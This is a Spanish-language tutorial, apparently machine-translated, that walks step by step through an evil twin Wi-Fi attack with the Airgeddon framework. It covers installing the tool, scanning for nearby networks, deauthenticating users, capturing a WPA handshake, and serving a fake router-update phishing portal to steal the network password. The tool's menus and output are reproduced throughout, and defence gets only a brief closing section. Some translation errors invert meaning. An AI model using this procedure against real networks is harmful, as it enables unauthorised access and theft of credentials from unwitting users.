Si bien las redes Wi-Fi pueden ser configuradas por personas inteligentes de TI, eso no significa que los usuarios del sistema sean igualmente expertos en tecnología. Demostraremos cómo un ataque gemelo malvado puede robar contraseñas Wi-Fi expulsando a un usuario de su red de confianza mientras crea una falsa casi idéntica. Esto obliga a la víctima a conectarse a la red falsa y proporcionar la contraseña de Wi-Fi para recuperar el acceso a Internet.

Si bien un usuario más técnico podría detectar este ataque, es sorprendentemente efectivo contra aquellos que no están capacitados para buscar actividad sospechosa en la red. La razón por la que tiene tanto éxito es que la mayoría de los usuarios no saben cómo es una actualización de firmware real, lo que genera confusión al reconocer que se está produciendo un ataque.

¿Qué es un ataque gemelo malvado?

Un ataque gemelo malvado es un tipo de ataque Wi-Fi que funciona aprovechando el hecho de que la mayoría de las computadoras y teléfonos solo verán el "nombre" o ESSID de una red inalámbrica. En realidad, esto hace que sea muy difícil distinguir entre redes con el mismo nombre y el mismo tipo de cifrado. De hecho, muchas redes tendrán varios puntos de acceso de extensión de red, todos con el mismo nombre para ampliar el acceso sin confundir a los usuarios.

Si desea ver cómo funciona esto, puede crear un punto de acceso Wi-Fi en su teléfono y nombrarlo de la misma manera que su red doméstica, y notará que es difícil distinguir la diferencia entre las dos redes o su computadora puede simplemente ver ambos como la misma red. Una herramienta de rastreo de redes como Wigle Wifi en Android o Kismet puede ver claramente la diferencia entre estas redes, pero para el usuario promedio, estas redes se verán iguales.

Esto funciona muy bien para engañar a un usuario para que se conecte si tenemos una red con el mismo nombre, la misma contraseña y el mismo cifrado, pero ¿qué pasa si aún no sabemos la contraseña? No podremos crear una red que engañe al usuario para que se conecte automáticamente, pero podemos intentar un ataque de ingeniería social para obligar al usuario a que nos dé la contraseña sacándolo de la red real.

Usando un ataque de portal cautivo

En un ataque gemelo malvado al estilo de un portal cautivo, utilizaremos el marco de ataque inalámbrico de Airgeddon para intentar obligar al usuario a conectarse a una red abierta con el mismo nombre que la red en la que confía. Un portal cautivo es algo así como la pantalla que ve cuando se conecta a una red abierta en una cafetería, en un avión o en un hotel . Esta pantalla que contiene términos y condiciones es algo a lo que la gente está acostumbrada a ver, y la usaremos a nuestro favor para crear una página de phishing que parezca que el enrutador se está actualizando.

La forma en que engañaremos a la víctima para que haga esto es inundando su red de confianza con paquetes de desautenticación, lo que imposibilitará la conexión a Internet con normalidad. Cuando se enfrenta a una conexión a Internet que se niega a conectarse y no permite ningún acceso a Internet, el usuario irritado promedio descubrirá una red Wi-Fi abierta con el mismo nombre que la red a la que no puede conectarse y asumirá que está relacionada. el problema.Al conectarse a la red, la víctima será redirigida a una página de phishing que explica que el enrutador se actualizó y requiere una contraseña para continuar. Si el usuario es crédulo, ingresará la contraseña de la red aquí, pero ahí no termina la diversión. Si la víctima se irrita por este inconveniente y escribe la contraseña incorrecta, debemos asegurarnos de que podemos distinguir una contraseña incorrecta de la correcta. Para hacer esto, primero capturaremos un protocolo de enlace de la red, para que podamos verificar cada contraseña que el usuario nos da y saber cuándo se ingresa la correcta.

Ingeniería Social Asistida Tecnológicamente

Para que este ataque funcione, se deben cumplir algunos requisitos clave. Primero, este ataque requiere que el usuario haga algunas cosas ignorantes. Si el objetivo que está seleccionando es conocido por ser experto en tecnología, es posible que este ataque no funcione. Un usuario avanzado, o cualquier persona con formación sobre seguridad cibernética, detectará este ataque en curso y muy posiblemente se dará cuenta de que se trata de un ataque relativamente cercano. Contra un objetivo bien defendido, puede esperar que este ataque sea detectado e incluso localizado para encontrarlo.

En segundo lugar, una víctima debe autenticarse con éxito desde su red y sentirse lo suficientemente frustrada como para unirse a una red abierta totalmente desconocida que apareció de la nada y tiene el mismo nombre de la red en la que confía. Además, intentar conectarse a esta red (en macOS) incluso genera una advertencia de que la última vez que se conectó a la red, tenía un tipo de cifrado diferente.

Finalmente, la víctima debe ingresar la contraseña de la red en la página de phishing, que a veces parece incompleta, a la que es redirigido después de unirse a la red abierta que ha creado el atacante. Hay muchas pistas que podrían alertar a un usuario inteligente sobre el hecho de que esta página, incluido el idioma incorrecto, la marca incorrecta del enrutador (si la página de phishing lo menciona), o faltas de ortografía en el texto de la página. Dado que las páginas del enrutador generalmente se ven bastante feas, es posible que estos detalles no se destaquen para nadie que no esté familiarizado con el aspecto de la página de administración de su enrutador.

Paso 1Asegúrate de tener todo
Para preparar nuestro ataque de punto de acceso gemelo malvado, necesitaremos usar Kali Linux u otra distribución compatible. Se admiten bastantes distribuciones, y puede consultar la página de GitHub de Airgeddon para obtener más información sobre con qué funcionará Airgeddon.


Puede usar una Raspberry Pi con Kali Linux para esto con un adaptador de red inalámbrica , pero deberá tener acceso a la GUI y no estar SSH en la Pi, ya que deberá poder abrir y navegar por varias ventanas. en este script multi-bash.


Finalmente, necesitará un buen adaptador de red inalámbrica para esto. En nuestras pruebas, encontramos que las tarjetas TP-Link WN722N v1 y Panda Wireless PAU07 funcionaron bien con estos ataques. Puede encontrar más información sobre cómo elegir un buen adaptador de red inalámbrica en el siguiente enlace.

Instalar Airgeddon
Para comenzar a usar el marco de ataque inalámbrico Airgeddon, necesitaremos descargar Airgeddon y cualquier programa necesario. El desarrollador también recomienda descargar e instalar una herramienta llamada CCZE para que el resultado sea más fácil de entender. Puede hacerlo escribiendo apt-get install ccze en una ventana de terminal.

~# apt-get install ccze

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
  libgit2-27
Use 'apt autoremove' to remove it.
The following NEW packages will be installed:
  ccze
0 upgraded, 1 newly installed, 0 to remove and 1772 not upgraded.
Need to get 77.2 kB of archives.
After this operation, 324 kB of additional disk space will be used.
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 ccze amd64 0.2.1-4+b1 [77.2 kB]
Fetched 77.2 kB in 1s (77.4 kB/s)
Selecting previously unselected package ccze.
(Reading database ... 411785 files and directories currently installed.)
Preparing to unpack .../ccze_0.2.1-4+b1_amd64.deb ...
Unpacking ccze (0.2.1-4+b1) ...
Setting up ccze (0.2.1-4+b1) ...
Processing triggers for man-db (2.8.5-2) ...
A continuación, instalaremos Airgeddon con git clone .

~# git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Cloning into 'airgeddon'...
remote: Enumerating objects: 6940, done.
remote: Total 6940 (delta 0), reused 0 (delta 0), pack-reused 6940
Receiving objects: 100% (6940/6940), 21.01 MiB | 10.31 MiB/s, done.
Resolving deltas: 100% (4369/4369), done.
Luego cambie de directorio e inicie Airgeddon con los siguientes comandos.

~# cd airgeddon
~/airgeddon# sudo bash ./airgeddon.sh
Si ves la nave extraterrestre, sabes que estás listo para piratear.

************************************ Welcome ************************************

Welcome to airgeddon script v10.0

                   .__                          .___  .___
           _____   |__|______  ____    ____   __| _/__| _/____   _____
            \__  \ |  \_  __ \/  ___\_/ __ \ / __ |/ __ |/  _ \ /     \
             / __ \|  ||  | \/  /_/  >  ___// /_/ / /_/ (  <_> )   |   \
            (____  /__||__|   \___  / \___  >____ \____ |\____/|___|   /
                 \/          /_____/      \/     \/    \/           \/

                               Devloped by v1s1t0r

                          *        .  _.---._          .
                                *  . '       ' .  .
                               _.-~=============~-._ *
                            . (_____________________)        *
                             *     \___________/        .

Paso 3Configurar Airgeddon
Presione Entrar para verificar las diversas herramientas en las que se basa el marco Airgeddon. Si te falta alguno (aparecerá "Error" junto a ellos), puedes presionar Y e Intro en el indicador para intentar instalar automáticamente cualquier cosa que falte, pero eso generalmente no funciona.


En su lugar, abra una nueva ventana de terminal y escriba apt-get install tool , sustituyendo "herramienta" por el nombre de la herramienta que falta. Si eso no funciona, también puede probar la herramienta de instalación Sudo pip . Debe instalar todas las herramientas, de lo contrario, puede experimentar problemas durante su ataque, especialmente si le falta dnsspoof .

*********************************** Welcome ************************************
This script is only for educational purposes. Be good boyz&girlz!
Use it only on your own networks!!

Accepted bash version (5.0.3(1)-release). Minimum required version: 4.2

Root permissions successfully detected

Detecting resolution... Detected!: 1408x1024

Known compatible distros with this script:
"Arch" "Backbox" "BlackArch" "CentOS" "Cyborg" "Debian" "Fedora" "Gentoo" "Kali" "Kali arm" "Mint" "OpenMandriva" "Parrot" "Parrot arm" "Pentoo" "Raspbian" "Red Hat" "SuSE" "Ubuntu" "Wifislax"

Detecting system...
Kali Linux

Let's check if you have installed what script needs
Press [Enter] key to continue...

Essential tools: checking...
ifconfig .... Ok
iwconfig .... Ok
iw .... Ok
awk .... Ok
airmon-ng .... Ok
airodump-ng .... Ok
aircrack-ng .... Ok
xterm .... Ok
ip .... Ok
lspci .... Ok
ps .... Ok

Optional tools: checking...
sslstrip .... Ok
asleap .... Ok
bettercap .... Ok
packetforge-ng .... Ok
etterlog .... Ok
hashcat .... Ok
wpaclean .... Ok
john .... Ok
aireplay-ng .... Ok
bully .... Ok
ettercap .... Ok
mdk4 .... Ok
hostapd .... Ok
lighttpd .... Ok
pixiewps .... Ok
wash .... Ok
openssl .... Ok
dhcpd .... Ok
reaver .... Ok
dnsspoof .... Ok
beef-xss .... Ok
hostapd-wpe .... Ok
iptables .... Ok
crunch .... Ok

Update tools: checking...
curl .... Ok

Your distro has all necessary essential tools. Script can continue...
Press [Enter] key to continue...
Cuando tenga todas las herramientas, continúe con el siguiente paso presionando Enter . A continuación, el script comprobará el acceso a Internet para que pueda actualizarse si existe una versión más nueva.

The script will check for internet access looking for a newer version. Please be patient...

The script is already in the latest version. It doesn't need to be updated
Press [Enter] key to continue...
Cuando termine, presione Entrar para seleccionar el adaptador de red a usar. Presione el número en su teclado que se correlaciona con el adaptador de red en la lista, luego ingrese .

***************************** Interface selection ******************************
Select an interface to work with:
---------
1.  eth0  // Chipset: Intel Corporation 82540EM
2.  wlan0 // 2.4Ghz // Chipset: Atheros Communications, Inc. AR9271 802.11n
---------
*Hint* Every time you see a text with the prefix [PoT] acronym for "Pending of Translation", means the translation has been automatically generated and is still pending of review
---------
>
Después de seleccionar nuestro adaptador de red inalámbrica, procederemos al menú principal de ataque.

***************************** airgeddon main menu ******************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz

Select an option from menu:
---------
0.  Exit script
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
---------
4.  DoS attacks menu
5.  Handshake tools menu
6.  Offline WPA/WPA2 decrypt menu
7.  Evil Twin attacks menu
8.  WPS attacks menu
9.  WEP attacks menu
10. Enterprise attacks menu
---------
11. About & Credits
12. Options and language menu
---------
*Hint* If you install ccze you'll see some parts of airgeddon in a colorized way with better aspect. It's not a requirement or a dependency, but it will improve the user experience
---------
>
Presione 2 y Enter para poner su tarjeta inalámbrica en modo monitor. A continuación, seleccione la opción 7 y Enter para el menú "Evil Twin attack", y verá aparecer el submenú para este módulo de ataque.

**************************** Evil Twin attacks menu ****************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz
Selected BSSID: None
Selected channel: None
Selected ESSID: None

Select an option from menu:
---------
0.  Return to main menu
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
4.  Explore for targets (monitor mode needed)
---------------- (without sniffing, just AP) -----------------
5.  Evil Twin attack just AP
---------------------- (with sniffing) -----------------------
6.  Evil Twin AP attack with sniffing
7.  Evil Twin AP attack with sniffing and sslstrip
8.  Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF
------------- (without sniffing, captive portal) -------------
9.  Evil Twin AP attack with captive portal (monitor mode needed)
---------
*Hint* In order to use the Evil Twin just AP and sniffing attacks, you must have another one interface in addition to the wifi network interface will become the AP, which will provide internet access to other clients on the network. This doesn't need to be wifi, can be ethernet
---------
>

Paso 4
Seleccione el objetivo
Ahora que estamos en nuestro módulo de ataque, seleccione la opción 9 e ingrese para el "ataque Evil Twin AP con un portal cautivo". Tendremos que buscar objetivos, así que presione Entrar y verá aparecer una ventana que muestra una lista de todas las redes detectadas. Deberá esperar un poco para completar una lista de todas las redes cercanas.

An exploration looking for targets is going to be done...
Press [Enter] key to continue...

**************************** Exploring for targets ****************************
Exploring for targets option chosen (monitor mode needed)
Selected interface qlan0mon is in monitor mode. Explorations can be performed
WPA/WPA2 filter enabled in scan. When started, press [Ctrl+C] to stop...
Press [Enter] key to continue...
Exploring for targets

CH 12 ][ Elapsed: 12 s ][ 2019-12-13 05:28
BSSID          PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
██████████████ -59        9        0    0  11  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -58        5        0    0  11  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -80       12        0    0  11  54e. WPA2 CCMP   PSK  ██████████████
██████████████ -79       14        0    0   6  54e. WPA2 CCMP   PSK  ██████████████
██████████████ -82        6        0    0   1  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -83        6        1    0   2  54e  WPA2 CCMP   PSK  ██████████████
██████████████ -85        2        0    0   6  54e. WPA2 CCMP   PSK  ██████████████

BSSID            STATION            PWR   Rate     Lost    Frames  Probe
(not associated) 00:7E:56:97:E9:B0  -68    0 - 1     29         5
██████████████   E8:1A:1B:D9:75:0A  -38    0 -24e     0         1
██████████████   62:38:E0:34:6A:7E  -58    0 - 0e     0         1
██████████████   DC:3A:5E:1D:3E:29  -57    0 -24    148         5
Después de que se ejecute durante unos 60 segundos, salga de la ventana pequeña y aparecerá una lista de objetivos. Notarás que las redes con alguien usándolas aparecen en amarillo con un asterisco al lado. Esto es esencial ya que no puede engañar a alguien para que le dé la contraseña si nadie está en la red en primer lugar.

**************************** Select target ****************************

  N.      BSSID      CHANNEL  PWR   ENC     ESSID
------------------------------------------------------
  1)* ██████████████    11    41%   WPA2   ██████████████
  2)* ██████████████    11    20%   WPA2   ██████████████
  3)  ██████████████     6    15%   WPA2   ██████████████
  4)  ██████████████     6    19%   WPA2   ██████████████
  5)  ██████████████     2    17%   WPA2   ██████████████
  6)  ██████████████     1    18%   WPA2   ██████████████
  7)  ██████████████    11    42%   WPA2   ██████████████

(*) Network with clients
------------------------------------------------------
Select target network:

Seleccione el número del objetivo que desea atacar y presione Entrar para pasar a la siguiente pantalla.

Reúne el apretón de manos

Ahora, seleccionaremos el tipo de ataque de desautenticación que queremos usar para expulsar al usuario de su red de confianza. Recomiendo la segunda opción, "Deauth aireplay attack", pero diferentes ataques funcionarán mejor dependiendo de la red.

Presione Entrar una vez que haya hecho su selección y se le preguntará si desea habilitar el modo de persecución DoS, que le permite seguir el AP si se mueve a otro canal. Puede seleccionar sí ( Y ) o no ( N ) según su preferencia, y luego presione Enter . Finalmente, seleccionará N para usar una interfaz con acceso a Internet. No necesitaremos para este ataque, y hará que nuestro ataque sea más portátil para no necesitar una fuente de Internet.

Handshake file selected: None
Selected internet interface: None

Select an option from menu:
---------
0.  Return to Evil Twin attacks menu
---------
1.  Deauth / disassoc amok mdk3 attack
2.  Deauth aireplay attack
3.  WIDS / WIPS / WDS Confusion attack
---------
*Hint* If you can't deauth clients from an AP using an attack, choose another one :)
---------
2

If you want to integrate "DoS pursuit mode" on an Evil Twin attack, another additional wifi interface in monitor mode will be needed to be able to perform it

Do you want to enable "DoS pursuit mode"? This will launch again the attack if target AP change its channel countering "channel hopping" [y/N]
N
At this point there are two options to prepare the captive portal. Either having an interface with internet access, or making a fake DNS using dnsspoof

Are you going to use the interface with internet access method? If the answer is no ("n"), you'll need dnsspoof installed to continue. Both will be checked [y/N]
N

A continuación, le preguntará si desea falsificar su dirección MAC durante el ataque. En este caso, elegí N por "no".

Ahora, si aún no tenemos un apretón de manos para esta red, tendremos que capturar uno ahora. Tenga MUCHO cuidado de no seleccionar accidentalmente Y para "¿Ya tiene un archivo de Handshake capturado?" si en realidad no tienes un apretón de manos. No hay una forma clara de volver al script sin reiniciar si comete este error.

Dado que aún no tenemos un apretón de manos, escriba N para no y presione Entrar para comenzar a capturar.

******************* Evil Twin AP attack with captive portal *******************
Interface wlan0mon selected. Mode: Monitor. Supported bands: 2.4Ghz
Selected BSSID: ██████████████
Selected channel: 11
Selected ESSID: ██████████████
Deauthentication chosen method: Aireplay
Handshake file selected: None
---------
*Hint* Sslstrip technique is not infallible. It depends on many factors and not always work. Some browsers such as Mozilla Firefox latest versions are not affected
---------

Do you want to spoof your MAC address during this attack? [y/N]
N
This attack requires that you have previously a WPA/WPA2 network captured Handshake file

If you don't have a captured Handshake file from the target network you can get it now
---------

Do you already have a captured Handshake file? Answer yes ("y") to enter the path or answers no ("n") to capture a new one now [y/N]
N
Una vez que haya comenzado el proceso de captura, se abrirá una ventana con texto rojo que envía paquetes de desautorización y una ventana con texto blanco que escucha los apretones de manos. Deberá esperar hasta que vea "WPA Handshake:" y luego la dirección BSSID de su red de destino. En el siguiente ejemplo, todavía estamos esperando un apretón de manos.

Una vez que vea que tiene el apretón de manos, puede salir de la ventana Capturar apretón de manos. Cuando el script le pregunte si obtuvo el apretón de manos, seleccione Y y guarde el archivo del apretón de manos. A continuación, seleccione la ubicación para escribir la contraseña robada y estará listo para ir al paso final de configurar la página de phishing.

Paso 6Configurar la página de phishing
En el último paso antes de lanzar el ataque, configuraremos el idioma de la página de phishing. La página proporcionada por Airgeddon es bastante decente para probar este estilo de ataque. En este ejemplo, seleccionaremos 1 para inglés. Cuando haya hecho su selección, presione Entrar y el ataque comenzará con seis ventanas abriéndose para realizar varias funciones del ataque simultáneamente.

Selected BSSID: ██████████████
Selected channel: 11
Selected ESSID: ██████████████
Deauthentication chosen method: Aireplay
Handshake file selected: /root/handshake-██████████████.cap

Choose the language in which network clients will see the captive portal:
---------
0.  Return to Evil Twin attacks menu
---------
1.  English
2.  Spanish
3.  French
4.  Catalan
5.  Portuguese
6.  Russian
7.  Greek
8.  Italian
9.  Polish
10. German
---------
*Hint* On Evil Twin attack with BeEF intergrated, in addition to obtaining keys using sniffing techniques, you can try to control the client's browser launching numerous attack vectors. The success of these will depend on many factors such as the kind of client's browser and its version
---------

Paso 7Capturar credenciales de red

Con el ataque en curso, la víctima debe ser expulsada de su red y ver nuestra red falsa como la única opción aparentemente familiar. Sea paciente y preste atención al estado de la red en la ventana superior derecha. Esto le indicará cuándo un dispositivo se une a la red, lo que le permitirá ver los intentos de contraseña que realizan cuando se enrutan al portal cautivo.

Cuando la víctima se una a su red, verá una ráfaga de actividad como en la imagen a continuación. En la esquina superior derecha, podrá ver los intentos fallidos de contraseña, que se comparan con el protocolo de enlace que recopilamos. Esto continuará hasta que la víctima ingrese la contraseña correcta, y todas sus solicitudes de Internet (que se ven en el cuadro de texto verde) fallarán hasta que lo haga.

Cuando la víctima se rinde y finalmente ingresa la contraseña correcta, las ventanas se cerrarán excepto la ventana superior derecha. La red falsa desaparecerá y la víctima podrá volver a conectarse a su red inalámbrica de confianza.

Las credenciales deben mostrarse en la pantalla de control superior derecha , y debe copiar y pegar la contraseña en un archivo para guardar, en caso de que la secuencia de comandos no guarde el archivo correctamente. Esto sucede a veces, así que asegúrese de no olvidar este paso o podría perder la contraseña que acaba de capturar.

Control

       Evil Twin AP Info // BSSID: ██████████████ // Channel: 11 // ESSID: ██████████████

       Online time
       00:01:40

       Password captured successfully:

/tmp/ag.control.sh: line 37: ${log_path}: ambiguous redirect
       ██████████████

       The password was saved on file: [/root/evil_twin_captive_portal_password-██████████████.██████.txt

       Press [Enter] on the main script window to continue, this window will be closed

Después de esto, puede cerrar la ventana y cerrar la herramienta presionando Ctrl + C. Si obtenemos una credencial válida en este paso, entonces nuestro ataque ha funcionado y obtuvimos la contraseña de Wi-Fi engañando al usuario para que la envíe a la página de phishing de nuestro AP falso.

Defensa contra un ataque AP gemelo malvado

La mejor manera de defenderse contra un ataque de gemelos malvados es conocer la táctica y saber que los signos de uno deberían hacerte sospechar mucho. Si pierde repentinamente la capacidad de conectarse a su red de confianza y de repente ve una red inalámbrica abierta con el mismo nombre, no se trata de una coincidencia ni de un giro normal de los acontecimientos.

Nunca te conectes a una red inalámbrica desconocida que pretenda ser tuya, especialmente una sin encriptación. Si sospecha que su enrutador realmente se está actualizando, apague su Wi-Fi y conéctelo directamente a la red Ethernet del enrutador para ver cuál es el problema.